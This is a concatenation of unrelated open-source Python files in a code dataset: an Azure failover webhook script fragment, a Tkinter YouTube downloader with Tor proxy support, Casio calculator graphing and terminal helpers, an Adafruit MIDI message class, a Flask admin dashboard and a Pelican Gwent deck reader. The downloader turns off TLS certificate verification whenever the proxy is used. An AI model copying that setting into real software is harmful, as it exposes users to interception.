logger.info("Second IP address provided and found")
if(options.down):
webhook = call_webhook(options.webhookurl, "secondnic", vnetname, secondhaip, secondboxip)
else:
webhook = call_webhook(options.webhookurl, "secondnic", vnetname, secondboxip, secondhaip)
logger.info("Calling the Webhook on :" + str(options.webhookurl))
if (json.loads(webhook)['JobIds']):
logger.info("Success JobID:" + (str(json.loads(webhook)['JobIds'])[2:-2]))
else:
logger.warning("failure to get status from webhook:" + webhook)
#If this is the 5th loop or if the webhook is successful then stops the
#loop condition being true
if (loopnum == 5):
condition = False
loopnum+=1
else:
if(options.down == "YES"):
logger.info("This box is not the active unit, but script was triggered under down condition. Failing over to the other boxes IP " + haip)
webhook = call_webhook(options.webhookurl, str(subid)[2:-2], vnetname, haip, boxip)
if (webhook != 'FAILED'):
condition = False
if (json.loads(webhook)['JobIds']):
logger.info("Success JobID:" + (str(json.loads(webhook)['JobIds'])[2:-2]))
else:
logger.warning("failure to get status from webhook:" + webhook)
if len(options.secondip) > 1:
logger.info("Second IP address provided and found")
webhook = call_webhook(options.webhookurl, "secondnic", vnetname, secondhaip, secondboxip)
logger.info("Calling the Webhook on :" + str(options.webhookurl))
if (json.loads(webhook)['JobIds']):
logger.info("Success JobID:" + (str(json.loads(webhook)['JobIds'])[2:-2]))
else:
logger.warning("failure to get status from webhook:" + webhook)
#ends the loop for the down box after 2 iterations.
if (loopnum == 2):
condition = False
else:
logger.warning("This NGF has is not running as the active unit.")
condition = False
#end of loop
if __name__ == "__main__":
exit(main())
``` |
{
"source": "4d6f5079/YoutubeDownloader",
"score": 2
} |
#### File: 4d6f5079/YoutubeDownloader/youtube_downloader.py
```python
from os import path
from tkinter.filedialog import askdirectory, askopenfile
from tkinter.ttk import Progressbar
from tkinter import Menu, messagebox
from tor_handler import TorHandler
from toplevel_window_manager import ToplevelManager
from video_quality_selector_manager import VideoQualitySelector
import threading
import youtube_dl
import tkinter as tk
import re
import logging
logging.basicConfig(
filename="logs.log",
level=logging.DEBUG,
format="%(asctime)s.%(msecs)03d %(levelname)s %(module)s - %(funcName)s: %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
root = None
TB_URL = None
TB_DESTINATION_PATH = None
BTN_START_DOWNLOAD = None
BTN_SELECT_DIR = None
BTN_DOWNLOAD_FROM_TXT = None
RIGHT_CLICK_MENU = None
PROXY_BUTTON = None
TOPLEVEL_WINDOW = None
CONVERSION_MODE_BTN = None
TOR_HANDLER = None
USING_PROXY = False
TOR_PROXY_CHECKED = -1
CONVERSION_MODE = "mp3"
USERAGENTS_FILEPATH = "./useragents.txt"
CURRENT_SCRIPT_PATH = path.abspath(path.dirname(__file__))
UNEXPCTED_ERR_MSG = "Unexpected error occured. Please check logs for more info."
threads = []
# this regex matches youtube urls with optional 'www.' behind 'youtube'
# alternative complicated regex: ^((?:https?:)?\/\/)?((?:www|m)\.)?((?:youtube\.com|youtu.be))(\/(?:[\w\-]+\?v=|embed\/|v\/)?)([\w\-]+)(\S+)?$
YOUTUBE_URL_REGEX = re.compile("^(https?\:\/\/)?(www\.)?(youtube\.com|youtu\.?be)\/.+$")
YOUTUBE_PLAYLIST_URL_REGEX = re.compile(
"^(?:https?:\/\/)?(?:www\.)?youtu\.?be(?:\.com)?.*?(?:v|list)=(.*?)(?:&|$)|^(?:https?:\/\/)?(?:www\.)?youtu\.?be(?:\.com)?(?:(?!=).)*\/(.*)$"
)
################################# PROGRESS BAR ##################################################################
# def create_toplevel_tk_window(label_text=None):
# global TOPLEVEL_WINDOW
# newWindow = tk.Toplevel()
# newWindow.title("Downloading...")
# newWindow.geometry("275x125")
# if label_text:
# label = tk.Label(master=newWindow, text=label_text, wraplength=newWindow.winfo_width())
# label.pack(padx=0,pady=0)
# TOPLEVEL_WINDOW = newWindow
# def show_progress(data):
# global TOPLEVEL_WINDOW
# try:
# # creating progress bar
# progress_bar = Progressbar(TOPLEVEL_WINDOW, length=250, s='black.Horizontal.TProgressbar')
# progress_bar['value'] = 0
# progress_bar.pack(padx=5, pady=25)
# if data['status'] == 'finished':
# progress_bar['value'] = 100
# if TOPLEVEL_WINDOW:
# TOPLEVEL_WINDOW.destroy()
# TOPLEVEL_WINDOW = None
# if data['status'] == 'downloading':
# p = data['_percent_str']
# p = p.replace('%', '')
# progress_bar['value'] = float(p)
# except Exception:
# show_error_message(UNEXPCTED_ERR_MSG)
# logging.exception(UNEXPCTED_ERR_MSG)
# if TOPLEVEL_WINDOW:
# TOPLEVEL_WINDOW.destroy()
# TOPLEVEL_WINDOW = None
###################################################################################################
##################################### UTILITIES #########################
def read_youtube_urls():
"""
Required format that the txt file containing the youtube urls must have:
url_1
url_2
.
.
.
url_n
:param filepath:
:return:
"""
yt_urls = []
file_to_read = askopenfile(mode="r", filetypes=[("Text file", "*.txt")])
if file_to_read is not None:
while True:
curr_url = file_to_read.readline()
cleaned_curr_url = curr_url.strip().rstrip("\n").strip("\r").strip("\t")
if not curr_url:
break
if not cleaned_curr_url:
continue
if YOUTUBE_URL_REGEX.findall(cleaned_curr_url):
yt_urls.append(cleaned_curr_url)
else:
show_error_message(
f'"{cleaned_curr_url}" IS NOT A VALID YOUTUBE URL. SKIPPED.'
)
return yt_urls
def select_download_dir():
global TB_DESTINATION_PATH
download_dir = askdirectory()
if TB_DESTINATION_PATH and download_dir:
TB_DESTINATION_PATH["state"] = tk.NORMAL
TB_DESTINATION_PATH.delete(0, tk.END)
TB_DESTINATION_PATH.insert(0, download_dir)
TB_DESTINATION_PATH["state"] = tk.DISABLED
###########################################################################
########################### THREADS ###################################
def convert_multiple_youtube_to_mp3():
t = threading.Thread(target=start_convert_multiple_youtube_to_mp3, args=())
t.start()
threads.append(t)
def convert_video_to_mp3():
t_d = threading.Thread(target=start_download, args=())
t_d.start()
threads.append(t_d)
#######################################################################
################################## PROXY STUFF $##########################
# def get_random_ua():
# # if file can be loaded in memory use: random.choice(open("useragents.txt").readlines())
# # Waterman's "Reservoir Algorithm" to get 1 line from file randomly in memory efficient way
# with open('useragents.txt') as f:
# line = next(f)
# for num, aline in enumerate(f, 2):
# if random.randrange(num):
# continue
# line = aline
# return line
def get_proxy():
# TODO: get random proxy if tor is not working
return TOR_HANDLER.socks5_url
##################################################################################
##################### YOUTUBE-DL YOUTUBE TO MP3 CONVERSION FOR GETTING VIDEO INFO AND OPTIONS THAT YOUTUBE-DL NEEDS ############
def get_available_formats(vids_info):
"""
Returns list of tuples of mp4 video formats in string representation and corresponding format_id
(excluding audio formats as the best is always chosen by default)
Args:
vids_info (list): the youtube info from the given video that needs to be downloaded
"""
formats = vids_info.get("formats", [vids_info])
available_formats_list = []
for f in formats:
if (
"audio" not in f["format"]
and f["ext"] == "mp4"
and "DASH" not in f["format"]
):
f_str = f"{f['ext']} - {f['format']}"
f_id = f["format_id"]
available_formats_list.append((f_id, f_str))
return available_formats_list
def get_vid_info(vid_url):
with youtube_dl.YoutubeDL() as ydl:
vid_info = ydl.extract_info(url=vid_url, download=False)
return vid_info
def get_video_options(
vid_dest: str,
conversion_mode: str,
video_quality_id: str = None
# progress_bar = True
):
global USING_PROXY
vid_name = "%(title)s.%(ext)s"
if conversion_mode == "mp3":
youtube_dl_options = {
"format": "bestaudio/best",
"outtmpl": path.join(vid_dest, vid_name),
"keepvideo": False,
"quiet": True,
# 'prefer_ffmpeg': True, # --> optional
"postprocessors": [
{
"key": "FFmpegExtractAudio",
"preferredcodec": "mp3",
"preferredquality": "192",
}
],
}
else:
# if no format specified, youtube_dl will download best audio with 480p video quality
# NOTE: if youtube_dl cant combine audio with specified mp4 format, it will convert it to mkv format instead
# with given vid quality and best audio
if not video_quality_id:
f = "bestvideo[height<=480]+bestaudio/best[height<=480]"
else:
f = f"{video_quality_id}+bestaudio"
youtube_dl_options = {
"format": f,
"outtmpl": path.join(vid_dest, vid_name),
"quiet": True,
}
if USING_PROXY:
proxy = get_proxy()
if proxy:
youtube_dl_options["proxy"] = proxy
youtube_dl_options["nocheckcertificate"] = True
# if progress_bar:
# youtube_dl_options['progress_hooks'] = [show_progress]
return youtube_dl_options
################################################################################################################################
########################################## HANDLING ERROR MESSAGES AND CHECK FOR YOUTUBE URL VALIDITY #####################
def show_info_message(msg, title="Information"):
messagebox.showinfo(title, msg)
def show_error_message(msg, title="Error"):
messagebox.showerror(title, msg)
def url_check(url):
if url == "":
show_error_message("Youtube URL not provided!")
return False
elif url is None:
show_error_message("Unknown Youtube URL!")
return False
elif not YOUTUBE_URL_REGEX.findall(url):
show_error_message("Please provide a valid Youtube URL!")
return False
else:
return True
##############################################################################################
###################################### HANDLING SELECTION QUALITY OF VIDEO ###################
def select_video_quality(vids_info: list) -> str:
"""Returns the format id of the selected format from the available formats
Args:
vids_info (dict): info about video to download
Returns:
format_id: the selected format id, otherwise empty string '' is returned
"""
global root
available_formats = get_available_formats(vids_info)
return VideoQualitySelector(root, available_formats, vids_info["title"]).show()
##############################################################################################
########################################## BUTTONS TOGGLES ###################################
def toggle_download_btns_state():
global BTN_START_DOWNLOAD, BTN_DOWNLOAD_FROM_TXT
if BTN_START_DOWNLOAD:
if BTN_START_DOWNLOAD["state"] == tk.NORMAL:
BTN_START_DOWNLOAD["state"] = tk.DISABLED
else:
BTN_START_DOWNLOAD["state"] = tk.NORMAL
if BTN_DOWNLOAD_FROM_TXT:
if BTN_DOWNLOAD_FROM_TXT["state"] == tk.NORMAL:
BTN_DOWNLOAD_FROM_TXT["state"] = tk.DISABLED
else:
BTN_DOWNLOAD_FROM_TXT["state"] = tk.NORMAL
##############################################################################################
##################################### HANDLE SINGLE URL DOWNLOAD AND MULTIPLE URLS DOWNLOADS LOGIC ###############
def start_convert_multiple_youtube_to_mp3():
global CONVERSION_MODE
try:
vids_dest = get_download_destination_path()
urls_to_download = read_youtube_urls()
# only continue when there are urls to download
if not urls_to_download:
return
# disable both download btn and btn of download from txt file
toggle_download_btns_state()
vids_info = []
for yt_url in urls_to_download:
vids_info.append(get_vid_info(yt_url))
vids_options = get_video_options(vids_dest, CONVERSION_MODE)
# start downloading and converting the given youtube videos to mp3
with youtube_dl.YoutubeDL(vids_options) as ydl:
for vid_info in vids_info:
# create toplevel window to show download progress for each download
with ToplevelManager(label_text=f'Downloading {vid_info["title"]} ...'):
# create_toplevel_tk_window(vid_info['title'])
ydl.download([vid_info["webpage_url"]])
toggle_download_btns_state()
show_info_message(
f"MP3 files downloaded successfully!",
"THE MP3 FILES HAVE BEEN DOWNLOADED SUCCESSFULLY!",
)
except Exception as e:
show_error_message(UNEXPCTED_ERR_MSG)
logging.exception(UNEXPCTED_ERR_MSG)
toggle_download_btns_state()
def start_download():
global CONVERSION_MODE
try:
vid_url = get_url_from_textbox()
vid_dest = get_download_destination_path()
if url_check(vid_url) is False:
return
toggle_download_btns_state()
vids_info = get_vid_info(vid_url)
# if link consists of multiple videos (playlist) then vids_info contains 'entries'
# otherwise there is 1 video
if "entries" in vids_info:
list_vids_options = [] # in case playlist of vids need to be downloaded
vids_options = None # in case playlist of mp3 need to be downloaded
if CONVERSION_MODE == "mp3":
vids_options = get_video_options(
vid_dest,
CONVERSION_MODE
# progress_bar=False
)
else:
list_selected_video_format = []
for idx, vid in enumerate(vids_info["entries"]):
selected_video_format = select_video_quality(vid)
# if not video format has been chosen, then just abort download
if not selected_video_format:
toggle_download_btns_state()
return
vid_opt = get_video_options(
vid_dest,
CONVERSION_MODE,
video_quality_id=selected_video_format
# progress_bar=False
)
list_vids_options.append(vid_opt)
if list_vids_options:
for vid_opt in list_vids_options:
with youtube_dl.YoutubeDL(vid_opt) as ydl:
ydl.download([vids_info["webpage_url"]])
else:
with youtube_dl.YoutubeDL(vids_options) as ydl:
ydl.download([vids_info["webpage_url"]])
else:
with ToplevelManager(label_text=f"Downloading {vids_info['title']} ..."):
if CONVERSION_MODE == "mp3":
vids_options = get_video_options(vid_dest, CONVERSION_MODE)
else:
selected_video_format = select_video_quality(vids_info)
# if not video format has been chosen, then just abort download
if not selected_video_format:
toggle_download_btns_state()
return
vids_options = get_video_options(
vid_dest,
CONVERSION_MODE,
video_quality_id=selected_video_format,
)
# create_toplevel_tk_window(vids_info['title'])
with youtube_dl.YoutubeDL(vids_options) as ydl:
ydl.download([vids_info["webpage_url"]])
toggle_download_btns_state()
if "entries" in vids_info:
show_info_message(
f'Playlist {vids_info["title"]} downloaded successfully!',
"PLAYLIST DOWNLOADED SUCCESSFULLY!",
)
else:
show_info_message(
f'MP3 file {vids_info["title"]} downloaded successfully!',
"THE MP3 FILE HAS BEEN DOWNLOADED SUCCESSFULLY!",
)
except Exception as e:
show_error_message(UNEXPCTED_ERR_MSG)
logging.exception(UNEXPCTED_ERR_MSG)
toggle_download_btns_state()
def handle_proxy_btn():
global PROXY_BUTTON, USING_PROXY, TOR_PROXY_CHECKED
if PROXY_BUTTON:
if PROXY_BUTTON.config("text")[-1] == "Currently NOT using proxy":
TOR_PROXY_CHECKED += 1
can_connect_to_tor = False
if (
TOR_PROXY_CHECKED % 5 == 0
): # check TOR connection after every 5 clicks on the button
try:
(
can_connect_to_tor,
ip,
tor_ip,
) = TOR_HANDLER.test_tor_proxy_connection()
except Exception:
show_error_message(UNEXPCTED_ERR_MSG)
logging.error(UNEXPCTED_ERR_MSG)
return
if can_connect_to_tor:
show_info_message(
f"Testing TOR Proxy\nYour IP:\n{ip}\nTor IP:\n{tor_ip}\nTor IP working correctly!"
)
PROXY_BUTTON.config(text="Currently using TOR proxy")
USING_PROXY = True
else:
show_info_message(
"Your IP and Tor IP are the same: check whether you are running tor from commandline"
)
else:
PROXY_BUTTON.config(text="Currently NOT using proxy")
USING_PROXY = False
def toggle_download_mode():
global CONVERSION_MODE_BTN, CONVERSION_MODE
if CONVERSION_MODE_BTN:
if CONVERSION_MODE_BTN.config("text")[-1] == "Current conversion mode: mp3":
CONVERSION_MODE_BTN.config(text="Current conversion mode: mp4")
CONVERSION_MODE = "mp4"
else:
CONVERSION_MODE_BTN.config(text="Current conversion mode: mp3")
CONVERSION_MODE = "mp3"
##########################################################################################
###################################### WIDGETS CREATION (Buttons and Textboxes) #####################
def create_root_buttons():
global root, BTN_START_DOWNLOAD, BTN_SELECT_DIR, BTN_DOWNLOAD_FROM_TXT, PROXY_BUTTON, CONVERSION_MODE_BTN
PROXY_BUTTON = tk.Button(
master=root, text="Currently NOT using proxy", command=handle_proxy_btn
)
CONVERSION_MODE_BTN = tk.Button(
master=root, text="Current conversion mode: mp3", command=toggle_download_mode
)
BTN_START_DOWNLOAD = tk.Button(
master=root,
text="Start download",
width=25,
height=5,
command=convert_video_to_mp3,
)
BTN_SELECT_DIR = tk.Button(
master=root,
text="Select download directory",
width=25,
height=5,
command=select_download_dir,
)
BTN_DOWNLOAD_FROM_TXT = tk.Button(
master=root,
text="Convert multiple youtube videos",
width=25,
height=5,
command=convert_multiple_youtube_to_mp3,
)
BTN_START_DOWNLOAD.pack(pady=5)
BTN_SELECT_DIR.pack(pady=5)
BTN_DOWNLOAD_FROM_TXT.pack(pady=5)
PROXY_BUTTON.pack(pady=5)
CONVERSION_MODE_BTN.pack(pady=5)
def create_root_textboxes():
global TB_URL, TB_DESTINATION_PATH
# create url label and textbox
url_label = tk.Label(text="Youtube Video URL (required)")
TB_URL = tk.Entry(width=80)
url_label.pack()
TB_URL.pack()
# create destination label and textbox
destination_label = tk.Label(
text="Destination path (where to download the video/mp3)."
)
TB_DESTINATION_PATH = tk.Entry(state=tk.NORMAL, width=80)
# insert current directory for the user for convinience
TB_DESTINATION_PATH.insert(0, CURRENT_SCRIPT_PATH)
TB_DESTINATION_PATH["state"] = tk.DISABLED
destination_label.pack()
TB_DESTINATION_PATH.pack()
###############################################################################################
########################################## GETTERS ##########################################
def get_url_from_textbox():
return TB_URL.get().strip()
def get_download_destination_path():
dest = TB_DESTINATION_PATH.get().strip()
# if destination textbox is left empty, then just default to current directory of the script
if dest == "" or dest is None:
return CURRENT_SCRIPT_PATH
return TB_DESTINATION_PATH.get()
##############################################################################################
########################################## SHOW RIGHT CLICK MENU ###############################
def right_click_menu():
global root, RIGHT_CLICK_MENU
if root:
RIGHT_CLICK_MENU = Menu(root, tearoff=0)
RIGHT_CLICK_MENU.add_command(
label="Cut", command=lambda: root.focus_get().event_generate("<<Cut>>")
)
RIGHT_CLICK_MENU.add_command(
label="Copy", command=lambda: root.focus_get().event_generate("<<Copy>>")
)
RIGHT_CLICK_MENU.add_command(
label="Paste", command=lambda: root.focus_get().event_generate("<<Paste>>")
)
root.bind("<Button-3>", right_click_handler)
def right_click_handler(event):
global RIGHT_CLICK_MENU
try:
RIGHT_CLICK_MENU.tk_popup(event.x_root, event.y_root)
finally:
RIGHT_CLICK_MENU.grab_release()
##############################################################################################
#################################### HANDLE CLOSING OF TKINTER WINDOW ######################
def exit_handler():
global threads, root
for t in threads:
if not t.is_alive():
t.handled = True
else:
t.handled = False
threads = [t for t in threads if not t.handled]
if not threads:
root.destroy()
##############################################################################################
########################################## MAIN GUI ##########################################
def init_tkinter_root(size):
global root
root = tk.Tk()
root.protocol("WM_DELETE_WINDOW", exit_handler)
root.wm_iconbitmap("logo.ico")
root.title("Youtube to MP3")
root.geometry(size)
root.minsize(400, 350)
root.maxsize(1000, 600)
root.grid_rowconfigure(0, weight=1)
root.grid_columnconfigure(0, weight=1)
# Add widgets
create_root_textboxes()
create_root_buttons()
right_click_menu()
root.mainloop()
def main(size_width=575, size_height=475):
global TOR_HANDLER
TOR_HANDLER = TorHandler() # init tor handler object
init_tkinter_root(f"{size_width}x{size_height}")
if __name__ == "__main__":
main()
``` |
{
"source": "4dc5/casio_graph",
"score": 3
} |
#### File: 4dc5/casio_graph/demo.py
```python
from graph import *
def func(x):
return sin(x)+sin(3*x)/3
g=Graph()
g.graph(func,xmin=-20,xmax=20)
```
#### File: 4dc5/casio_graph/graph.py
```python
from casioplot import *
from math import *
# Draw a graph.
#
# To use it, do this:
#
# from graph import *
#
# def func(x):
# return sin(x)+sin(3*x)/3
#
# g=Graph()
# g.graph(func,xmin=-20,xmax=20)
class Graph:
def graph(self,fn,xmin=-5.0,xmax=5.0,color=(0,0,0)):
# Lists of x values and y values
xl=[]
yl=[]
# Set graph edges
sxmin=20 # Left
sxmax=383 # Right
symin=0 # Top
symax=171 # Bottom
sxrange=sxmax-sxmin
syvrange=symax-symin
# Evaluate function for every x pixel
for i in range(0,sxrange+1):
x=i/sxrange * (xmax-xmin) + xmin
xl.append(x)
y=fn(x)
yl.append(y)
# Update min and max y values
if i==0:
ymin=y
ymax=y
if y<ymin:
ymin=y
if y>ymax:
ymax=y
# Edge case: if it's just constant y, make min and max y different
if ymin==ymax:
ymin-=1
ymax+=1
# Add a margin to top and bottom
ymid=(ymin+ymax)/2
ymax=(ymax-ymid)*1.05+ymid
ymin=(ymin-ymid)*1.05+ymid
yvrange=ymax-ymin
xvrange=xmax-xmin
# Draw vertical grid lines, using a heuristic to work out the intervals
expt=floor(log10(xvrange))
ex1=floor(xmin/10**expt)
ex2=ceil(xmax/10**expt)
for ex in range(ex1,ex2+1):
x=ex*10**expt
sx=int((x-xmin)/(xvrange)*sxrange)
for sy in range(0,(syvrange+1)):
set_pixel(sx+sxmin,sy,(127,127,127))
draw_string(sx+sxmin,175,str(x))
# Draw horizontal grid lines, using a heuristic to work out the intervals
expt=floor(log10(yvrange))
ex1=floor(ymin/10**expt)
ex2=ceil(ymax/10**expt)
for ex in range(ex1,ex2+1):
y=ex*10**expt
sy=int(syvrange-(y-ymin)/(yvrange)*syvrange)
for sx in range(0,(sxrange+1)):
set_pixel(sx+sxmin,sy,(127,127,127))
draw_string(0,sy,str(y))
# Plot the graph
for sx in range(1,(sxrange+1)):
# Calculate previous and current y values
sy1=int(syvrange-(yl[sx-1]-ymin)/(yvrange)*syvrange)
sy2=int(syvrange-(yl[sx]-ymin)/(yvrange)*syvrange)
# Set step depending on whether curve is going up or down
if sy1>sy2:
st=-1
else:
st=1
# Draw vertical line from previous y to current y (so we don't have gaps)
for sy in range(sy1,sy2+st,st):
self._point(sx+sxmin,sy,color)
show_screen()
# Draw a thick point
def _point(self,x,y,color=(0,0,0)):
set_pixel(x,y,color)
set_pixel(x-1,y,color)
set_pixel(x,y-1,color)
set_pixel(x+1,y,color)
set_pixel(x,y+1,color)
``` |
{
"source": "4dc5/casio_terminal",
"score": 4
} |
#### File: 4dc5/casio_terminal/terminal.py
```python
from casioplot import *
# Make a configurable display environment for the Casio fx-CG50.
#
# To use, do this in your file:
# from terminal.py import *
# term=Terminal()
# term.xprint("String to display")
#
# For different colors, try for example:
# term=Terminal(bg=(0,255,255),fg=(255,0,0))
class Terminal:
# Default to black background and green foreground. Set bg and/or fg to change this.
def __init__(self,bg=(0,0,0),fg=(0,255,0)):
self.scr=[] # The screen buffer
self.bg=bg
self.fg=fg
self.rows=11 # Text rows
self.cols=34 # Text columns
self.clear()
# Clear the screen.
def clear(self):
# We print the letter 'T' all over the screen. Do it as little as possible, for speed.
for y in range(0,189,3):
for x in range(0,3):
draw_string(x,y,"T"*32,self.bg)
# We missed some pixels at the bottom of the screen, so fill them in now.
for x in range(0,3):
draw_string(x,189,"T"*32,self.bg)
# Refresh the screen with whatever we have in the buffer.
def refresh(self):
self.clear()
# We only want the number of rows we can fit on the screen, so truncate the buffer.
self.scr=self.scr[-self.rows:]
# Write the buffer rows to the screen.
y=0
for r in self.scr:
draw_string(5,8+y*16,r,self.fg)
y+=1
show_screen()
# Print a string on the screen.
def xprint(self,s):
s=str(s)
self.scr.extend(self._lines(s))
self.refresh()
# Split a string into a number of lines that will fit within the screen width.
def _lines(self,s):
r=[]
while len(s)>self.cols:
r.append(s[:self.cols])
s=s[-(len(s)-self.cols):]
if len(s)>0:
r.append(s)
return r
``` |
{
"source": "4dcu-be/Adafruit_CircuitPython_MIDI",
"score": 2
} |
#### File: Adafruit_CircuitPython_MIDI/adafruit_midi/control_change.py
```python
from .midi_message import MIDIMessage
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_MIDI.git"
class ControlChange(MIDIMessage):
"""Control Change MIDI message.
:param int control: The control number, 0-127.
:param int value: The 7bit value of the control, 0-127.
"""
_STATUS = 0xB0
_STATUSMASK = 0xF0
LENGTH = 3
def __init__(self, control, value, *, channel=None):
self.control = control
self.value = value
super().__init__(channel=channel)
if not 0 <= self.control <= 127 or not 0 <= self.value <= 127:
raise self._EX_VALUEERROR_OOR
def __bytes__(self):
return bytes(
[self._STATUS | (self.channel & self.CHANNELMASK), self.control, self.value]
)
@classmethod
def from_bytes(cls, msg_bytes):
return cls(msg_bytes[1], msg_bytes[2], channel=msg_bytes[0] & cls.CHANNELMASK)
ControlChange.register_message_type()
``` |
{
"source": "4dcu-be/BusyBoard2",
"score": 2
} |
#### File: BusyBoard2/busyboard/admin.py
```python
from flask import redirect, url_for
from flask_admin.contrib.sqla import ModelView
from flask_admin import form
from jinja2 import Markup
from flask_admin import expose, AdminIndexView
def _list_thumbnail(view, context, model, name):
if not model.filename:
return ''
return Markup(
'<img src="{model.url}" style="width: 150px;">'.format(model=model)
)
class UserAdminView(ModelView):
form_columns = ('name', 'busy', 'busy_with', 'can_be_disturbed', 'notes', 'path')
form_excluded_columns = ('last_updated')
column_editable_list = ('name', 'busy', 'busy_with', 'can_be_disturbed', 'notes')
form_create_rules = ('name', 'busy', 'busy_with', 'can_be_disturbed', 'notes', 'path')
form_edit_rules = ('name', 'busy', 'busy_with', 'can_be_disturbed', 'notes', 'path')
can_create = True
column_formatters = {
'image': _list_thumbnail
}
form_extra_fields = {
'path': form.ImageUploadField(
'Image',
base_path='busyboard/static/images',
url_relative_path='images/',
)
}
class CustomIndexView(AdminIndexView):
def is_visible(self):
# This view won't appear in the menu structure
return False
@expose('/')
def index(self):
return redirect(url_for('main_route'))
```
#### File: BusyBoard2/busyboard/__init__.py
```python
import os
from flask import Flask, render_template, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_admin import Admin
from busyboard.admin import UserAdminView, CustomIndexView
from flask_uploads import UploadSet, IMAGES, configure_uploads, patch_request_class
db = SQLAlchemy()
images = UploadSet('images', IMAGES)
def create_app(config):
# Set up app, database and login manager before importing models and controllers
# Important for db_create script
app = Flask(__name__)
app.config.from_object(config)
db.app = app
db.init_app(app)
configure_uploads(app, (images))
patch_request_class(app, 16 * 1024 * 1024)
from busyboard.models import User
admin = Admin(app, name='BusyBoard', template_mode='bootstrap3', index_view=CustomIndexView())
admin.add_view(UserAdminView(User, db.session, endpoint='users'))
@app.route('/')
def main_route():
users = User.query.all()
return render_template('index.html', users=users)
@app.route('/api/users')
@app.route('/api/users/')
def api_users():
users = User.query.all()
return jsonify(list([u.to_dict() for u in users]))
@app.route('/api/users/<int:user_id>')
def api_user(user_id: int):
user = User.query.get(user_id)
return jsonify(user.to_dict())
@app.cli.command()
def createdb():
"""
function to create the initial database and migration information
"""
SQLALCHEMY_DATABASE_URI = app.config['SQLALCHEMY_DATABASE_URI']
if SQLALCHEMY_DATABASE_URI.startswith('sqlite:///'):
path = os.path.dirname(os.path.realpath(SQLALCHEMY_DATABASE_URI.replace('sqlite:///', '')))
if not os.path.exists(path):
os.makedirs(path)
db.create_all(app=app)
return app
``` |
{
"source": "4dcu-be/DeckLock",
"score": 2
} |
#### File: plugins/gwent/reader.py
```python
from pelican import signals
from pelican.readers import BaseReader
import json
import os
from pathlib import Path
from urllib.parse import urlparse
from bs4 import BeautifulSoup
import requests
from time import sleep
import posixpath
from plugins.utils import fetch_image, get_last_modified
from pelican.utils import slugify
from itertools import accumulate
def get_local_card_img_path(assets_cards_path, url):
img_filename = Path(urlparse(url).path).name
return posixpath.join(assets_cards_path, img_filename)
def parse_meta(line):
stripped_line = line.lstrip("//").strip()
tag, value = [p.strip() for p in stripped_line.split(":")]
return tag, value
def parse_card_line(line):
card_count, card_name = line.strip().split(" ", 1)
return int(card_count), card_name
def parse_card_data(card_data, card_name):
soup = BeautifulSoup(card_data, "html.parser")
index = -1
results = []
# In case there are multiple results find exact match
for ix, result in enumerate(soup.find_all("div", class_="card-name")):
results.append(result)
# This character is a problem with utf-8 encoding
# TODO: Work out a better solution or encoding to avoid this
if card_name.lower() == str(result.text.replace("É", "E")).lower():
index = ix
if index < 0:
print(f"ERROR: {card_name} not found in {results}!")
quit()
card_attributes = soup.find_all("div", class_="card-wrap card-data")[index]
card_name = soup.find_all("div", class_="card-name")[index]
card_category = soup.find_all("div", class_="card-category")[index]
card_body_ability = soup.find_all("div", class_="card-body-ability")[index]
image_url = "https://gwent.one/image/gwent/assets/card/art/medium/%d.jpg" % int(
card_attributes.get("data-artid").replace("j", "")
)
output = {
"name": card_name.text,
"art_id": card_attributes.get("data-artid"),
"power": card_attributes.get("data-power"),
"armor": card_attributes.get("data-armor"),
"provision": int(card_attributes.get("data-provision")),
"faction": card_attributes.get("data-faction"),
"color": card_attributes.get("data-color"),
"type": card_attributes.get("data-type"),
"rarity": card_attributes.get("data-rarity"),
"category": card_category.text,
"body_ability": card_body_ability.text,
"body_ability_html": str(card_body_ability),
"image_url": image_url,
}
return output
def get_card_data(card_name, card_version, sleep_time=0.1):
gwent_one_endpoint = "https://gwent.one/search/abilities"
post_data = {
"q": card_name,
"version": card_version,
"Token": 1,
"view": "sCard",
"language": "en",
}
r = requests.post(gwent_one_endpoint, data=post_data)
sleep(sleep_time)
return parse_card_data(r.text, card_name)
def parse_card_type(type_line):
if " — " in type_line:
p = type_line.split(" — ")[0]
else:
p = type_line
parts = p.split()
return parts[-1].lower()
class GwentReader(BaseReader):
enabled = True
file_extensions = ["gwent"]
def __init__(self, settings):
super(GwentReader, self).__init__(settings)
self.cached_data = {}
if os.path.exists(self.gwent_data_path):
with open(self.gwent_data_path, "r") as fin:
self.cached_data = json.load(fin)
Path(self.gwent_assets_cards_path(full=True)).mkdir(parents=True, exist_ok=True)
@property
def gwent_data_path(self):
Path(self.settings.get("PATH"), self.settings.get("DECKLOCK_CACHE")).mkdir(
parents=True, exist_ok=True
)
return posixpath.join(
self.settings.get("PATH"),
self.settings.get("DECKLOCK_CACHE"),
"gwent.cached_cards.json",
)
def write_cache(self):
with open(self.gwent_data_path, "w") as fout:
json.dump(
self.cached_data, fout, sort_keys=True, indent=4, separators=(",", ": ")
)
def gwent_assets_cards_path(self, full=False):
if full:
return posixpath.join(
self.settings.get("PATH"),
self.settings.get("GWENT_ASSETS_PATH"),
"cards",
)
else:
return posixpath.join(self.settings.get("GWENT_ASSETS_PATH"), "cards")
def add_card_data(self, card_name, card_version):
if card_version not in self.cached_data.keys():
self.cached_data[card_version] = {}
if card_name not in self.cached_data[card_version].keys():
card_data = get_card_data(card_name, card_version)
self.cached_data[card_version][card_name] = card_data
else:
card_data = self.cached_data[card_version][card_name]
try:
img_url = card_data["image_url"]
local_path = get_local_card_img_path(
self.gwent_assets_cards_path(full=False), img_url
)
self.cached_data[card_version][card_name]["image_path"] = local_path
local_path_full = get_local_card_img_path(
self.gwent_assets_cards_path(full=True), img_url
)
if not self.settings.get("USE_EXTERNAL_LINKS"):
fetch_image(img_url, local_path_full)
except Exception as e:
print(f"an error occurred fetching {card_name} from version {card_version}")
print(e)
def read(self, filename):
metadata = {
"category": "Gwent_Deck",
"date": get_last_modified(filename),
"template": "gwent_deck",
}
deck_data = []
description = []
leader = None
stratagem = None
with open(filename, "r", encoding="utf-8") as fin:
for line in fin:
if line.startswith("//"):
tag, value = parse_meta(line)
metadata[tag.lower()] = value
elif line.startswith("---"):
# This is the description, read until end of file
for dl in fin:
description.append(dl.strip())
elif line.strip() != "":
card_count, card_name = parse_card_line(line)
card_version = metadata["gwent_version"]
self.add_card_data(card_name, card_version)
card_data = {
"name": card_name,
"count": card_count,
